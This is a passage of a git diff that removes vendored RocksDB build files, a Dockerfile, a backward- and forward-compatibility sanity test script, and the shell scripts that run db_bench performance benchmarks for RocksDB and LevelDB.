-  set (THIRDPARTY_LIBS ${THIRDPARTY_LIBS} ${ZLIB_LIBS})
-else ()
-  message(STATUS "ZLIB library is disabled")
-endif ()
-
-if (DEFINED XPRESS)
-  set(USE_XPRESS ${XPRESS})
-else ()
-  set(USE_XPRESS ${USE_XPRESS_DEFAULT})
-endif ()
-
-if (${USE_XPRESS} EQUAL 1)
-  message(STATUS "XPRESS is enabled")
-
-  add_definitions(-DXPRESS)
-  
-  # We are using the implementation provided by the system
-  set (SYSTEM_LIBS ${SYSTEM_LIBS} Cabinet.lib)
-else ()
-  message(STATUS "XPRESS is disabled")
-endif ()
-
-#
-# Edit these 4 lines to define paths to Jemalloc
-#
-set(JEMALLOC_HOME $ENV{THIRDPARTY_HOME}/Jemalloc.Library)
-set(JEMALLOC_INCLUDE ${JEMALLOC_HOME}/inc/include)
-set(JEMALLOC_LIB_DEBUG ${JEMALLOC_HOME}/bin/debug/amd64/jemalloc.lib)
-set(JEMALLOC_LIB_RELEASE ${JEMALLOC_HOME}/bin/retail/amd64/jemalloc.lib)
-
-# ================================================== JEMALLOC ==================================================
-#
-# Don't touch these lines
-#
-
-# For compatibilty with previous
-if(JEMALLOC)
-  set(WITH_JEMALLOC ON)
-endif()
-
-if (WITH_JEMALLOC)
-  message(STATUS "JEMALLOC library is enabled")
-  set(JEMALLOC_CXX_FLAGS "-DROCKSDB_JEMALLOC -DJEMALLOC_EXPORT= ")
-  
-  if(DEFINED ENV{JEMALLOC_INCLUDE})
-    set(JEMALLOC_INCLUDE $ENV{JEMALLOC_INCLUDE})
-  endif()
-  
-  if(DEFINED ENV{JEMALLOC_LIB_DEBUG})
-    set(JEMALLOC_LIB_DEBUG $ENV{JEMALLOC_LIB_DEBUG})
-  endif()
-
-  if(DEFINED ENV{JEMALLOC_LIB_RELEASE})
-    set(JEMALLOC_LIB_RELEASE $ENV{JEMALLOC_LIB_RELEASE})
-  endif()
-
-  set(JEMALLOC_LIBS debug ${JEMALLOC_LIB_DEBUG} optimized ${JEMALLOC_LIB_RELEASE})
-
-  add_definitions(${JEMALLOC_CXX_FLAGS})
-  include_directories(${JEMALLOC_INCLUDE})
-  set (THIRDPARTY_LIBS ${THIRDPARTY_LIBS} ${JEMALLOC_LIBS})
-  set (ARTIFACT_SUFFIX "_je")
-  
-  set(WITH_JEMALLOC ON)
-  
-else ()
-  set (ARTIFACT_SUFFIX "")
-  message(STATUS "JEMALLOC library is disabled")
-endif ()
diff --git a/thirdparty/rocksdb/tools/CMakeLists.txt b/thirdparty/rocksdb/tools/CMakeLists.txt
deleted file mode 100644
index 6c4733a..0000000
--- a/thirdparty/rocksdb/tools/CMakeLists.txt
+++ /dev/null
@@ -1,21 +0,0 @@
-set(TOOLS
-  sst_dump.cc
-  db_sanity_test.cc
-  db_stress.cc
-  write_stress.cc
-  ldb.cc
-  db_repl_stress.cc
-  dump/rocksdb_dump.cc
-  dump/rocksdb_undump.cc)
-foreach(src ${TOOLS})
-  get_filename_component(exename ${src} NAME_WE)
-  add_executable(${exename}${ARTIFACT_SUFFIX}
-    ${src})
-  target_link_libraries(${exename}${ARTIFACT_SUFFIX} ${LIBS})
-  list(APPEND tool_deps ${exename})
-endforeach()
-add_custom_target(tools
-  DEPENDS ${tool_deps})
-add_custom_target(ldb_tests
-  COMMAND python ${CMAKE_CURRENT_SOURCE_DIR}/ldb_tests.py
-  DEPENDS ldb)
diff --git a/thirdparty/rocksdb/tools/Dockerfile b/thirdparty/rocksdb/tools/Dockerfile
deleted file mode 100644
index 1d5ead7..0000000
--- a/thirdparty/rocksdb/tools/Dockerfile
+++ /dev/null
@@ -1,5 +0,0 @@
-FROM buildpack-deps:wheezy
-
-ADD ./ldb /rocksdb/tools/ldb
-
-CMD /rocksdb/tools/ldb
diff --git a/thirdparty/rocksdb/tools/auto_sanity_test.sh b/thirdparty/rocksdb/tools/auto_sanity_test.sh
deleted file mode 100755
index 54577ff..0000000
--- a/thirdparty/rocksdb/tools/auto_sanity_test.sh
+++ /dev/null
@@ -1,91 +0,0 @@
-TMP_DIR="${TMPDIR:-/tmp}/rocksdb-sanity-test"
-
-if [ "$#" -lt 2 ]; then
-  echo "usage: ./auto_sanity_test.sh [new_commit] [old_commit]"
-  echo "Missing either [new_commit] or [old_commit], perform sanity check with the latest and 10th latest commits."
-  recent_commits=`git log | grep -e "^commit [a-z0-9]\+$"| head -n10 | sed -e 's/commit //g'`
-  commit_new=`echo "$recent_commits" | head -n1`
-  commit_old=`echo "$recent_commits" | tail -n1`
-  echo "the most recent commits are:"
-  echo "$recent_commits"
-else
-  commit_new=$1
-  commit_old=$2
-fi
-
-if [ ! -d $TMP_DIR ]; then
-  mkdir $TMP_DIR
-fi
-dir_new="${TMP_DIR}/${commit_new}"
-dir_old="${TMP_DIR}/${commit_old}"
-
-function makestuff() {
-  echo "make clean"
-  make clean > /dev/null
-  echo "make db_sanity_test -j32"
-  make db_sanity_test -j32 > /dev/null
-  if [ $? -ne 0 ]; then
-    echo "[ERROR] Failed to perform 'make db_sanity_test'"
-    exit 1
-  fi
-}
-
-rm -r -f $dir_new
-rm -r -f $dir_old
-
-echo "Running db sanity check with commits $commit_new and $commit_old."
-
-echo "============================================================="
-echo "Making build $commit_new"
-git checkout $commit_new
-if [ $? -ne 0 ]; then
-  echo "[ERROR] Can't checkout $commit_new"
-  exit 1
-fi
-makestuff
-mv db_sanity_test new_db_sanity_test
-echo "Creating db based on the new commit --- $commit_new"
-./new_db_sanity_test $dir_new create
-cp ./tools/db_sanity_test.cc $dir_new
-cp ./tools/auto_sanity_test.sh $dir_new
-
-echo "============================================================="
-echo "Making build $commit_old"
-git checkout $commit_old
-if [ $? -ne 0 ]; then
-  echo "[ERROR] Can't checkout $commit_old"
-  exit 1
-fi
-cp -f $dir_new/db_sanity_test.cc ./tools/.
-cp -f $dir_new/auto_sanity_test.sh ./tools/.
-makestuff
-mv db_sanity_test old_db_sanity_test
-echo "Creating db based on the old commit --- $commit_old"
-./old_db_sanity_test $dir_old create
-
-echo "============================================================="
-echo "[Backward Compatibility Check]"
-echo "Verifying old db $dir_old using the new commit --- $commit_new"
-./new_db_sanity_test $dir_old verify
-if [ $? -ne 0 ]; then
-  echo "[ERROR] Backward Compatibility Check fails:"
-  echo "    Verification of $dir_old using commit $commit_new failed."
-  exit 2
-fi
-
-echo "============================================================="
-echo "[Forward Compatibility Check]"
-echo "Verifying new db $dir_new using the old commit --- $commit_old"
-./old_db_sanity_test $dir_new verify
-if [ $? -ne 0 ]; then
-  echo "[ERROR] Forward Compatibility Check fails:"
-  echo "    $dir_new using commit $commit_old failed."
-  exit 2
-fi
-
-rm old_db_sanity_test
-rm new_db_sanity_test
-rm -rf $dir_new
-rm -rf $dir_old
-
-echo "Auto sanity test passed!"
diff --git a/thirdparty/rocksdb/tools/benchmark.sh b/thirdparty/rocksdb/tools/benchmark.sh
deleted file mode 100755
index 1a2c384..0000000
--- a/thirdparty/rocksdb/tools/benchmark.sh
+++ /dev/null
@@ -1,511 +0,0 @@
-#!/usr/bin/env bash
-# REQUIRE: db_bench binary exists in the current directory
-
-if [ $# -ne 1 ]; then
-  echo -n "./benchmark.sh [bulkload/fillseq/overwrite/filluniquerandom/"
-  echo    "readrandom/readwhilewriting/readwhilemerging/updaterandom/"
-  echo    "mergerandom/randomtransaction/compact]"
-  exit 0
-fi
-
-# Make it easier to run only the compaction test. Getting valid data requires
-# a number of iterations and having an ability to run the test separately from
-# rest of the benchmarks helps.
-if [ "$COMPACTION_TEST" == "1" -a "$1" != "universal_compaction" ]; then
-  echo "Skipping $1 because it's not a compaction test."
-  exit 0
-fi
-
-# size constants
-K=1024
-M=$((1024 * K))
-G=$((1024 * M))
-
-if [ -z $DB_DIR ]; then
-  echo "DB_DIR is not defined"
-  exit 0
-fi
-
-if [ -z $WAL_DIR ]; then
-  echo "WAL_DIR is not defined"
-  exit 0
-fi
-
-output_dir=${OUTPUT_DIR:-/tmp/}
-if [ ! -d $output_dir ]; then
-  mkdir -p $output_dir
-fi
-
-# all multithreaded tests run with sync=1 unless
-# $DB_BENCH_NO_SYNC is defined
-syncval="1"
-if [ ! -z $DB_BENCH_NO_SYNC ]; then
-  echo "Turning sync off for all multithreaded tests"
-  syncval="0";
-fi
-
-num_threads=${NUM_THREADS:-16}
-mb_written_per_sec=${MB_WRITE_PER_SEC:-0}
-# Only for tests that do range scans
-num_nexts_per_seek=${NUM_NEXTS_PER_SEEK:-10}
-cache_size=${CACHE_SIZE:-$((1 * G))}
-compression_max_dict_bytes=${COMPRESSION_MAX_DICT_BYTES:-0}
-compression_type=${COMPRESSION_TYPE:-snappy}
-duration=${DURATION:-0}
-
-num_keys=${NUM_KEYS:-$((1 * G))}
-key_size=${KEY_SIZE:-20}
-value_size=${VALUE_SIZE:-400}
-block_size=${BLOCK_SIZE:-8192}
-
-const_params="
-  --db=$DB_DIR \
-  --wal_dir=$WAL_DIR \
-  \
-  --num=$num_keys \
-  --num_levels=6 \
-  --key_size=$key_size \
-  --value_size=$value_size \
-  --block_size=$block_size \
-  --cache_size=$cache_size \
-  --cache_numshardbits=6 \
-  --compression_max_dict_bytes=$compression_max_dict_bytes \
-  --compression_ratio=0.5 \
-  --compression_type=$compression_type \
-  --level_compaction_dynamic_level_bytes=true \
-  --bytes_per_sync=$((8 * M)) \
-  --cache_index_and_filter_blocks=0 \
-  --pin_l0_filter_and_index_blocks_in_cache=1 \
-  --benchmark_write_rate_limit=$(( 1024 * 1024 * $mb_written_per_sec )) \
-  \
-  --hard_rate_limit=3 \
-  --rate_limit_delay_max_milliseconds=1000000 \
-  --write_buffer_size=$((128 * M)) \
-  --target_file_size_base=$((128 * M)) \
-  --max_bytes_for_level_base=$((1 * G)) \
-  \
-  --verify_checksum=1 \
-  --delete_obsolete_files_period_micros=$((60 * M)) \
-  --max_bytes_for_level_multiplier=8 \
-  \
-  --statistics=0 \
-  --stats_per_interval=1 \
-  --stats_interval_seconds=60 \
-  --histogram=1 \
-  \
-  --memtablerep=skip_list \
-  --bloom_bits=10 \
-  --open_files=-1"
-
-l0_config="
-  --level0_file_num_compaction_trigger=4 \
-  --level0_slowdown_writes_trigger=12 \
-  --level0_stop_writes_trigger=20"
-
-if [ $duration -gt 0 ]; then
-  const_params="$const_params --duration=$duration"
-fi
-
-params_w="$const_params \
-          $l0_config \
-          --max_background_compactions=16 \
-          --max_write_buffer_number=8 \
-          --max_background_flushes=7"
-
-params_bulkload="$const_params \
-                 --max_background_compactions=16 \
-                 --max_write_buffer_number=8 \
-                 --max_background_flushes=7 \
-                 --level0_file_num_compaction_trigger=$((10 * M)) \
-                 --level0_slowdown_writes_trigger=$((10 * M)) \
-                 --level0_stop_writes_trigger=$((10 * M))"
-
-#
-# Tune values for level and universal compaction.
-# For universal compaction, these level0_* options mean total sorted of runs in
-# LSM. In level-based compaction, it means number of L0 files.
-#
-params_level_compact="$const_params \
-                --max_background_flushes=4 \
-                --max_write_buffer_number=4 \
-                --level0_file_num_compaction_trigger=4 \
-                --level0_slowdown_writes_trigger=16 \
-                --level0_stop_writes_trigger=20"
-
-params_univ_compact="$const_params \
-                --max_background_flushes=4 \
-                --max_write_buffer_number=4 \
-                --level0_file_num_compaction_trigger=8 \
-                --level0_slowdown_writes_trigger=16 \
-                --level0_stop_writes_trigger=20"
-
-function summarize_result {
-  test_out=$1
-  test_name=$2
-  bench_name=$3
-
-  # Note that this function assumes that the benchmark executes long enough so
-  # that "Compaction Stats" is written to stdout at least once. If it won't
-  # happen then empty output from grep when searching for "Sum" will cause
-  # syntax errors.
-  uptime=$( grep ^Uptime\(secs $test_out | tail -1 | awk '{ printf "%.0f", $2 }' )
-  stall_time=$( grep "^Cumulative stall" $test_out | tail -1  | awk '{  print $3 }' )
-  stall_pct=$( grep "^Cumulative stall" $test_out| tail -1  | awk '{  print $5 }' )
-  ops_sec=$( grep ^${bench_name} $test_out | awk '{ print $5 }' )
-  mb_sec=$( grep ^${bench_name} $test_out | awk '{ print $7 }' )
-  lo_wgb=$( grep "^  L0" $test_out | tail -1 | awk '{ print $8 }' )
-  sum_wgb=$( grep "^ Sum" $test_out | tail -1 | awk '{ print $8 }' )
-  sum_size=$( grep "^ Sum" $test_out | tail -1 | awk '{ printf "%.1f", $3 / 1024.0 }' )
-  wamp=$( echo "scale=1; $sum_wgb / $lo_wgb" | bc )
-  wmb_ps=$( echo "scale=1; ( $sum_wgb * 1024.0 ) / $uptime" | bc )
-  usecs_op=$( grep ^${bench_name} $test_out | awk '{ printf "%.1f", $3 }' )
-  p50=$( grep "^Percentiles:" $test_out | tail -1 | awk '{ printf "%.1f", $3 }' )
-  p75=$( grep "^Percentiles:" $test_out | tail -1 | awk '{ printf "%.1f", $5 }' )
-  p99=$( grep "^Percentiles:" $test_out | tail -1 | awk '{ printf "%.0f", $7 }' )
-  p999=$( grep "^Percentiles:" $test_out | tail -1 | awk '{ printf "%.0f", $9 }' )
-  p9999=$( grep "^Percentiles:" $test_out | tail -1 | awk '{ printf "%.0f", $11 }' )
-  echo -e "$ops_sec\t$mb_sec\t$sum_size\t$lo_wgb\t$sum_wgb\t$wamp\t$wmb_ps\t$usecs_op\t$p50\t$p75\t$p99\t$p999\t$p9999\t$uptime\t$stall_time\t$stall_pct\t$test_name" \
-    >> $output_dir/report.txt
-}
-
-function run_bulkload {
-  # This runs with a vector memtable and the WAL disabled to load faster. It is still crash safe and the
-  # client can discover where to restart a load after a crash. I think this is a good way to load.
-  echo "Bulk loading $num_keys random keys"
-  cmd="./db_bench --benchmarks=fillrandom \
-       --use_existing_db=0 \
-       --disable_auto_compactions=1 \
-       --sync=0 \
-       $params_bulkload \
-       --threads=1 \
-       --memtablerep=vector \
-       --disable_wal=1 \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/benchmark_bulkload_fillrandom.log"
-  echo $cmd | tee $output_dir/benchmark_bulkload_fillrandom.log
-  eval $cmd
-  summarize_result $output_dir/benchmark_bulkload_fillrandom.log bulkload fillrandom
-  echo "Compacting..."
-  cmd="./db_bench --benchmarks=compact \
-       --use_existing_db=1 \
-       --disable_auto_compactions=1 \
-       --sync=0 \
-       $params_w \
-       --threads=1 \
-       2>&1 | tee -a $output_dir/benchmark_bulkload_compact.log"
-  echo $cmd | tee $output_dir/benchmark_bulkload_compact.log
-  eval $cmd
-}
-
-#
-# Parameter description:
-#
-# $1 - 1 if I/O statistics should be collected.
-# $2 - compaction type to use (level=0, universal=1).
-# $3 - number of subcompactions.
-# $4 - number of maximum background compactions.
-#
-function run_manual_compaction_worker {
-  # This runs with a vector memtable and the WAL disabled to load faster.
-  # It is still crash safe and the client can discover where to restart a
-  # load after a crash. I think this is a good way to load.
-  echo "Bulk loading $num_keys random keys for manual compaction."
-
-  fillrandom_output_file=$output_dir/benchmark_man_compact_fillrandom_$3.log
-  man_compact_output_log=$output_dir/benchmark_man_compact_$3.log
-
-  if [ "$2" == "1" ]; then
-    extra_params=$params_univ_compact
-  else
-    extra_params=$params_level_compact
-  fi
-
-  # Make sure that fillrandom uses the same compaction options as compact.
-  cmd="./db_bench --benchmarks=fillrandom \
-       --use_existing_db=0 \
-       --disable_auto_compactions=0 \
-       --sync=0 \
-       $extra_params \
-       --threads=$num_threads \
-       --compaction_measure_io_stats=$1 \
-       --compaction_style=$2 \
-       --subcompactions=$3 \
-       --memtablerep=vector \
-       --disable_wal=1 \
-       --max_background_compactions=$4 \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $fillrandom_output_file"
-
-  echo $cmd | tee $fillrandom_output_file
-  eval $cmd
-
-  summarize_result $fillrandom_output_file man_compact_fillrandom_$3 fillrandom
-
-  echo "Compacting with $3 subcompactions specified ..."
-
-  # This is the part we're really interested in. Given that compact benchmark
-  # doesn't output regular statistics then we'll just use the time command to
-  # measure how long this step takes.
-  cmd="{ \
-       time ./db_bench --benchmarks=compact \
-       --use_existing_db=1 \
-       --disable_auto_compactions=0 \
-       --sync=0 \
-       $extra_params \
-       --threads=$num_threads \
-       --compaction_measure_io_stats=$1 \
-       --compaction_style=$2 \
-       --subcompactions=$3 \
-       --max_background_compactions=$4 \
-       ;}
-       2>&1 | tee -a $man_compact_output_log"
-
-  echo $cmd | tee $man_compact_output_log
-  eval $cmd
-
-  # Can't use summarize_result here. One way to analyze the results is to run
-  # "grep real" on the resulting log files.
-}
-
-function run_univ_compaction {
-  # Always ask for I/O statistics to be measured.
-  io_stats=1
-
-  # Values: kCompactionStyleLevel = 0x0, kCompactionStyleUniversal = 0x1.
-  compaction_style=1
-
-  # Define a set of benchmarks.
-  subcompactions=(1 2 4 8 16)
-  max_background_compactions=(16 16 8 4 2)
-
-  i=0
-  total=${#subcompactions[@]}
-
-  # Execute a set of benchmarks to cover variety of scenarios.
-  while [ "$i" -lt "$total" ]
-  do
-    run_manual_compaction_worker $io_stats $compaction_style ${subcompactions[$i]} \
-      ${max_background_compactions[$i]}
-    ((i++))
-  done
-}
-
-function run_fillseq {
-  # This runs with a vector memtable. WAL can be either disabled or enabled
-  # depending on the input parameter (1 for disabled, 0 for enabled). The main
-  # benefit behind disabling WAL is to make loading faster. It is still crash
-  # safe and the client can discover where to restart a load after a crash. I
-  # think this is a good way to load.
-
-  # Make sure that we'll have unique names for all the files so that data won't
-  # be overwritten.
-  if [ $1 == 1 ]; then
-    log_file_name=$output_dir/benchmark_fillseq.wal_disabled.v${value_size}.log
-    test_name=fillseq.wal_disabled.v${value_size}
-  else
-    log_file_name=$output_dir/benchmark_fillseq.wal_enabled.v${value_size}.log
-    test_name=fillseq.wal_enabled.v${value_size}
-  fi
-
-  echo "Loading $num_keys keys sequentially"
-  cmd="./db_bench --benchmarks=fillseq \
-       --use_existing_db=0 \
-       --sync=0 \
-       $params_w \
-       --min_level_to_compress=0 \
-       --threads=1 \
-       --memtablerep=vector \
-       --disable_wal=$1 \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $log_file_name"
-  echo $cmd | tee $log_file_name
-  eval $cmd
-
-  # The constant "fillseq" which we pass to db_bench is the benchmark name.
-  summarize_result $log_file_name $test_name fillseq
-}
-
-function run_change {
-  operation=$1
-  echo "Do $num_keys random $operation"
-  out_name="benchmark_${operation}.t${num_threads}.s${syncval}.log"
-  cmd="./db_bench --benchmarks=$operation \
-       --use_existing_db=1 \
-       --sync=$syncval \
-       $params_w \
-       --threads=$num_threads \
-       --merge_operator=\"put\" \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} ${operation}.t${num_threads}.s${syncval} $operation
-}
-
-function run_filluniquerandom {
-  echo "Loading $num_keys unique keys randomly"
-  cmd="./db_bench --benchmarks=filluniquerandom \
-       --use_existing_db=0 \
-       --sync=0 \
-       $params_w \
-       --threads=1 \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/benchmark_filluniquerandom.log"
-  echo $cmd | tee $output_dir/benchmark_filluniquerandom.log
-  eval $cmd
-  summarize_result $output_dir/benchmark_filluniquerandom.log filluniquerandom filluniquerandom
-}
-
-function run_readrandom {
-  echo "Reading $num_keys random keys"
-  out_name="benchmark_readrandom.t${num_threads}.log"
-  cmd="./db_bench --benchmarks=readrandom \
-       --use_existing_db=1 \
-       $params_w \
-       --threads=$num_threads \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} readrandom.t${num_threads} readrandom
-}
-
-function run_readwhile {
-  operation=$1
-  echo "Reading $num_keys random keys while $operation"
-  out_name="benchmark_readwhile${operation}.t${num_threads}.log"
-  cmd="./db_bench --benchmarks=readwhile${operation} \
-       --use_existing_db=1 \
-       --sync=$syncval \
-       $params_w \
-       --threads=$num_threads \
-       --merge_operator=\"put\" \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} readwhile${operation}.t${num_threads} readwhile${operation}
-}
-
-function run_rangewhile {
-  operation=$1
-  full_name=$2
-  reverse_arg=$3
-  out_name="benchmark_${full_name}.t${num_threads}.log"
-  echo "Range scan $num_keys random keys while ${operation} for reverse_iter=${reverse_arg}"
-  cmd="./db_bench --benchmarks=seekrandomwhile${operation} \
-       --use_existing_db=1 \
-       --sync=$syncval \
-       $params_w \
-       --threads=$num_threads \
-       --merge_operator=\"put\" \
-       --seek_nexts=$num_nexts_per_seek \
-       --reverse_iterator=$reverse_arg \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} ${full_name}.t${num_threads} seekrandomwhile${operation}
-}
-
-function run_range {
-  full_name=$1
-  reverse_arg=$2
-  out_name="benchmark_${full_name}.t${num_threads}.log"
-  echo "Range scan $num_keys random keys for reverse_iter=${reverse_arg}"
-  cmd="./db_bench --benchmarks=seekrandom \
-       --use_existing_db=1 \
-       $params_w \
-       --threads=$num_threads \
-       --seek_nexts=$num_nexts_per_seek \
-       --reverse_iterator=$reverse_arg \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} ${full_name}.t${num_threads} seekrandom
-}
-
-function run_randomtransaction {
-  echo "..."
-  cmd="./db_bench $params_r --benchmarks=randomtransaction \
-       --num=$num_keys \
-       --transaction_db \
-       --threads=5 \
-       --transaction_sets=5 \
-       2>&1 | tee $output_dir/benchmark_randomtransaction.log"
-  echo $cmd | tee $output_dir/benchmark_rangescanwhilewriting.log
-  eval $cmd
-}
-
-function now() {
-  echo `date +"%s"`
-}
-
-report="$output_dir/report.txt"
-schedule="$output_dir/schedule.txt"
-
-echo "===== Benchmark ====="
-
-# Run!!!
-IFS=',' read -a jobs <<< $1
-for job in ${jobs[@]}; do
-
-  if [ $job != debug ]; then
-    echo "Start $job at `date`" | tee -a $schedule
-  fi
-
-  start=$(now)
-  if [ $job = bulkload ]; then
-    run_bulkload
-  elif [ $job = fillseq_disable_wal ]; then
-    run_fillseq 1
-  elif [ $job = fillseq_enable_wal ]; then
-    run_fillseq 0
-  elif [ $job = overwrite ]; then
-    run_change overwrite
-  elif [ $job = updaterandom ]; then
-    run_change updaterandom
-  elif [ $job = mergerandom ]; then
-    run_change mergerandom
-  elif [ $job = filluniquerandom ]; then
-    run_filluniquerandom
-  elif [ $job = readrandom ]; then
-    run_readrandom
-  elif [ $job = fwdrange ]; then
-    run_range $job false
-  elif [ $job = revrange ]; then
-    run_range $job true
-  elif [ $job = readwhilewriting ]; then
-    run_readwhile writing
-  elif [ $job = readwhilemerging ]; then
-    run_readwhile merging
-  elif [ $job = fwdrangewhilewriting ]; then
-    run_rangewhile writing $job false
-  elif [ $job = revrangewhilewriting ]; then
-    run_rangewhile writing $job true
-  elif [ $job = fwdrangewhilemerging ]; then
-    run_rangewhile merging $job false
-  elif [ $job = revrangewhilemerging ]; then
-    run_rangewhile merging $job true
-  elif [ $job = randomtransaction ]; then
-    run_randomtransaction
-  elif [ $job = universal_compaction ]; then
-    run_univ_compaction
-  elif [ $job = debug ]; then
-    num_keys=1000; # debug
-    echo "Setting num_keys to $num_keys"
-  else
-    echo "unknown job $job"
-    exit
-  fi
-  end=$(now)
-
-  if [ $job != debug ]; then
-    echo "Complete $job in $((end-start)) seconds" | tee -a $schedule
-  fi
-
-  echo -e "ops/sec\tmb/sec\tSize-GB\tL0_GB\tSum_GB\tW-Amp\tW-MB/s\tusec/op\tp50\tp75\tp99\tp99.9\tp99.99\tUptime\tStall-time\tStall%\tTest"
-  tail -1 $output_dir/report.txt
-
-done
diff --git a/thirdparty/rocksdb/tools/benchmark_leveldb.sh b/thirdparty/rocksdb/tools/benchmark_leveldb.sh
deleted file mode 100755
index 7769969..0000000
--- a/thirdparty/rocksdb/tools/benchmark_leveldb.sh
+++ /dev/null
@@ -1,185 +0,0 @@
-#!/usr/bin/env bash
-# REQUIRE: db_bench binary exists in the current directory
-#
-# This should be used with the LevelDB fork listed here to use additional test options.
-# For more details on the changes see the blog post listed below.
-#   https://github.com/mdcallag/leveldb-1
-#   http://smalldatum.blogspot.com/2015/04/comparing-leveldb-and-rocksdb-take-2.html
-
-if [ $# -ne 1 ]; then
-  echo -n "./benchmark.sh [fillseq/overwrite/readrandom/readwhilewriting]"
-  exit 0
-fi
-
-# size constants
-K=1024
-M=$((1024 * K))
-G=$((1024 * M))
-
-if [ -z $DB_DIR ]; then
-  echo "DB_DIR is not defined"
-  exit 0
-fi
-
-output_dir=${OUTPUT_DIR:-/tmp/}
-if [ ! -d $output_dir ]; then
-  mkdir -p $output_dir
-fi
-
-# all multithreaded tests run with sync=1 unless
-# $DB_BENCH_NO_SYNC is defined
-syncval="1"
-if [ ! -z $DB_BENCH_NO_SYNC ]; then
-  echo "Turning sync off for all multithreaded tests"
-  syncval="0";
-fi
-
-num_threads=${NUM_THREADS:-16}
-# Only for *whilewriting, *whilemerging
-writes_per_second=${WRITES_PER_SECOND:-$((10 * K))}
-cache_size=${CACHE_SIZE:-$((1 * G))}
-
-num_keys=${NUM_KEYS:-$((1 * G))}
-key_size=20
-value_size=${VALUE_SIZE:-400}
-block_size=${BLOCK_SIZE:-4096}
-
-const_params="
-  --db=$DB_DIR \
-  \
-  --num=$num_keys \
-  --value_size=$value_size \
-  --cache_size=$cache_size \
-  --compression_ratio=0.5 \
-  \
-  --write_buffer_size=$((2 * M)) \
-  \
-  --histogram=1 \
-  \
-  --bloom_bits=10 \
-  --open_files=$((20 * K))"
-
-params_w="$const_params "
-
-function summarize_result {
-  test_out=$1
-  test_name=$2
-  bench_name=$3
-  nthr=$4
-
-  usecs_op=$( grep ^${bench_name} $test_out | awk '{ printf "%.1f", $3 }' )
-  mb_sec=$( grep ^${bench_name} $test_out | awk '{ printf "%.1f", $5 }' )
-  ops=$( grep "^Count:" $test_out | awk '{ print $2 }' )
-  ops_sec=$( echo "scale=0; (1000000.0 * $nthr) / $usecs_op" | bc )
-  avg=$( grep "^Count:" $test_out | awk '{ printf "%.1f", $4 }' )
-  p50=$( grep "^Min:" $test_out | awk '{ printf "%.1f", $4 }' )
-  echo -e "$ops_sec\t$mb_sec\t$usecs_op\t$avg\t$p50\t$test_name" \
-    >> $output_dir/report.txt
-}
-
-function run_fillseq {
-  # This runs with a vector memtable and the WAL disabled to load faster. It is still crash safe and the
-  # client can discover where to restart a load after a crash. I think this is a good way to load.
-  echo "Loading $num_keys keys sequentially"
-  cmd="./db_bench --benchmarks=fillseq \
-       --use_existing_db=0 \
-       --sync=0 \
-       $params_w \
-       --threads=1 \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/benchmark_fillseq.v${value_size}.log"
-  echo $cmd | tee $output_dir/benchmark_fillseq.v${value_size}.log
-  eval $cmd
-  summarize_result $output_dir/benchmark_fillseq.v${value_size}.log fillseq.v${value_size} fillseq 1
-}
-
-function run_change {
-  operation=$1
-  echo "Do $num_keys random $operation"
-  out_name="benchmark_${operation}.t${num_threads}.s${syncval}.log"
-  cmd="./db_bench --benchmarks=$operation \
-       --use_existing_db=1 \
-       --sync=$syncval \
-       $params_w \
-       --threads=$num_threads \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} ${operation}.t${num_threads}.s${syncval} $operation $num_threads
-}
-
-function run_readrandom {
-  echo "Reading $num_keys random keys"
-  out_name="benchmark_readrandom.t${num_threads}.log"
-  cmd="./db_bench --benchmarks=readrandom \
-       --use_existing_db=1 \
-       $params_w \
-       --threads=$num_threads \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} readrandom.t${num_threads} readrandom $num_threads
-}
-
-function run_readwhile {
-  operation=$1
-  echo "Reading $num_keys random keys while $operation"
-  out_name="benchmark_readwhile${operation}.t${num_threads}.log"
-  cmd="./db_bench --benchmarks=readwhile${operation} \
-       --use_existing_db=1 \
-       --sync=$syncval \
-       $params_w \
-       --threads=$num_threads \
-       --writes_per_second=$writes_per_second \
-       --seed=$( date +%s ) \
-       2>&1 | tee -a $output_dir/${out_name}"
-  echo $cmd | tee $output_dir/${out_name}
-  eval $cmd
-  summarize_result $output_dir/${out_name} readwhile${operation}.t${num_threads} readwhile${operation} $num_threads
-}
-
-function now() {
-  echo `date +"%s"`
-}
-
-report="$output_dir/report.txt"
-schedule="$output_dir/schedule.txt"
-
-echo "===== Benchmark ====="
-
-# Run!!!
-IFS=',' read -a jobs <<< $1
-for job in ${jobs[@]}; do
-
-  if [ $job != debug ]; then
-    echo "Start $job at `date`" | tee -a $schedule
-  fi
-
-  start=$(now)
-  if [ $job = fillseq ]; then
-    run_fillseq
-  elif [ $job = overwrite ]; then
-    run_change overwrite
-  elif [ $job = readrandom ]; then
-    run_readrandom
-  elif [ $job = readwhilewriting ]; then
-    run_readwhile writing
-  elif [ $job = debug ]; then
-    num_keys=1000; # debug
-    echo "Setting num_keys to $num_keys"
-  else
-    echo "unknown job $job"
-    exit
-  fi
-  end=$(now)
-
-  if [ $job != debug ]; then
-    echo "Complete $job in $((end-start)) seconds" | tee -a $schedule
-  fi
-
-  echo -e "ops/sec\tmb/sec\tusec/op\tavg\tp50\tTest"
-  tail -1 $output_dir/report.txt
-
-done
